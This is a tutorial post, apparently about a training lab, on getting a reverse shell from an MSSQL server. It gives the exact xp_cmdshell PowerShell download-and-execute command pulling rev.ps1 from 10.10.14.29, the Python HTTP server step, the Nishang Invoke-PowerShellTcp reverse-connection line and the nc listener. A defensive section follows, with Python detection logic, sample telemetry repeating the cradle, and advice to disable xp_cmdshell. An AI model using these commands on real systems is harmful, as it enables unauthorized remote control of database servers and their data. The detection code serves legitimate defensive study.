MSSQL RCE and REVERSE SHELL XP_CMDSHELL with Nishang

Hi folks,

I am going to continue the tutorial from my previous post, where we enabled command execution from MSSQL using the xp_cmdshell function.

In this tutorial, we will cover three things:

1. Prepare the reverse shell script with Nishang PowerShell
2. Set up a Python HTTP server for shell delivery
3. Set up an nc listener to receive the reverse connection

Let's configure the first one. Nishang is a collection of ready-made PowerShell scripts for several purposes such as backdooring, privilege escalation and so on. If you are a Kali Linux user, you can find the scripts at the path below:

root@kali:~# ls -l /usr/share/nishang/
total 48
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Antak-WebShell
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Backdoors
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Escalation
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Execution
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Gather
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Misc
-rw-r--r-- 1 root root  495 Jun  4 11:14 nishang.psm1
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Pivot
drwxr-xr-x 2 root root 4096 Jun  4 11:15 powerpreter
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Prasadhak
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Scan
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Utility

Here are the steps to prepare the file:

The next step is to prepare the delivery. To deliver the PowerShell script we have prepared, we create a PowerShell download one-liner and execute it on the server through xp_cmdshell. Here is the full script:

1> xp_cmdshell "powershell IEX(New-Object Net.webclient).downloadString('http://10.10.14.29/rev.ps1')"
2> go

The above script will download our Nishang PowerShell script from our machine (10.10.14.29), so we need to start an HTTP server on our box:

python -m SimpleHTTPServer 80

The last step is to set up the nc listener. It will listen on the port that matches the one we defined in the Nishang script:

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.29 -Port 8000

so we need to listen on port 8000:

nc -nlvp 8000
Prepare everything

Here are the steps of the reverse connection being established:

That is it, all done. We are now connected and have control of the remote server's shell.
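From the defender's side, the chain shown in this post (xp_cmdshell, a PowerShell download cradle, a shell process spawned under SQL Server, then an outbound connection from that shell) leaves three distinct traces. The following is an added example, not code from this post or from the Nishang project, showing detection logic over a few constructed telemetry lines. The `key=value|key=value` event layout, the field names (`type`, `login`, `text`, `pid`, `image`, `ancestry`, `direction`, `dst`, `dport`) and the sample events are all assumptions made for this example; real sources such as SQL Server audit output or Sysmon process and network events would need their own parser.

```python
"""
Added example (not part of the original post): defender-side detection of the
xp_cmdshell -> PowerShell download cradle -> reverse shell chain described above.
Telemetry format and sample events below are constructed for illustration.
"""
import re
from dataclasses import dataclass

# Indicators of the PowerShell download cradle used in the post's xp_cmdshell call.
INDICATORS = {
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "webclient": re.compile(r"New-Object\s+(System\.)?Net\.WebClient", re.I),
    "downloadstring": re.compile(r"\.DownloadString\s*\(", re.I),
    "remote_url": re.compile(r"https?://", re.I),
}

# Shell images that SQL Server itself has no legitimate reason to spawn.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


@dataclass
class Finding:
    severity: str
    rule: str
    detail: str


def parse_event(line: str) -> dict:
    """Parse one 'key=value|key=value' telemetry line (constructed format)."""
    fields = {}
    for part in line.strip().split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def cradle_indicators(text: str) -> list:
    """Return the names of download-cradle indicators present in command text."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def analyze(lines: list) -> list:
    """Run the three rules over telemetry lines and return findings in order."""
    findings = []
    shell_pids = set()  # pids of shells whose ancestry includes sqlservr.exe
    for line in lines:
        ev = parse_event(line)
        kind = ev.get("type")
        if kind == "sql":
            # Rule 1: xp_cmdshell use; escalate when cradle indicators accompany it.
            hits = cradle_indicators(ev.get("text", ""))
            if "xp_cmdshell" in hits:
                sev = "high" if len(hits) >= 3 else "medium"
                findings.append(Finding(sev, "xp_cmdshell_exec",
                                        f"login={ev.get('login')} indicators={hits}"))
        elif kind == "proc":
            # Rule 2: a shell with sqlservr.exe anywhere in its process ancestry.
            ancestry = [a.strip().lower() for a in ev.get("ancestry", "").split(",")]
            image = ev.get("image", "").lower()
            if "sqlservr.exe" in ancestry and image in SHELLS:
                shell_pids.add(ev.get("pid"))
                findings.append(Finding("high", "sqlserver_spawned_shell",
                                        f"pid={ev.get('pid')} image={image} "
                                        f"ancestry={ev.get('ancestry')}"))
        elif kind == "net":
            # Rule 3: one of those shells opening an outbound connection.
            if ev.get("pid") in shell_pids and ev.get("direction") == "outbound":
                findings.append(Finding("critical", "possible_reverse_shell",
                                        f"pid={ev.get('pid')} -> "
                                        f"{ev.get('dst')}:{ev.get('dport')}"))
    return findings


# Constructed sample telemetry; the IP and port mirror the values used in the post.
SAMPLE_EVENTS = [
    "type=sql|login=sa|text=SELECT name FROM sys.databases",
    "type=sql|login=sa|text=EXEC sp_configure 'xp_cmdshell', 1",
    "type=sql|login=sa|text=xp_cmdshell 'powershell IEX(New-Object Net.WebClient)"
    ".DownloadString(''http://10.10.14.29/rev.ps1'')'",
    "type=proc|pid=4120|image=cmd.exe|ancestry=sqlservr.exe",
    "type=proc|pid=4133|image=powershell.exe|ancestry=cmd.exe,sqlservr.exe",
    "type=proc|pid=5001|image=powershell.exe|ancestry=explorer.exe",
    "type=net|pid=4133|direction=outbound|dst=10.10.14.29|dport=8000",
    "type=net|pid=5001|direction=outbound|dst=10.10.14.29|dport=443",
]


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.severity:8}] {f.rule}: {f.detail}")
```

The process-ancestry rule is the most robust of the three, because it does not depend on how the command text is obfuscated: whatever xp_cmdshell runs, it runs as a child of sqlservr.exe. The cheapest mitigation remains leaving xp_cmdshell disabled (`sp_configure 'xp_cmdshell', 0`) and alerting on any attempt to enable it, which is exactly what the second sample event would surface.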
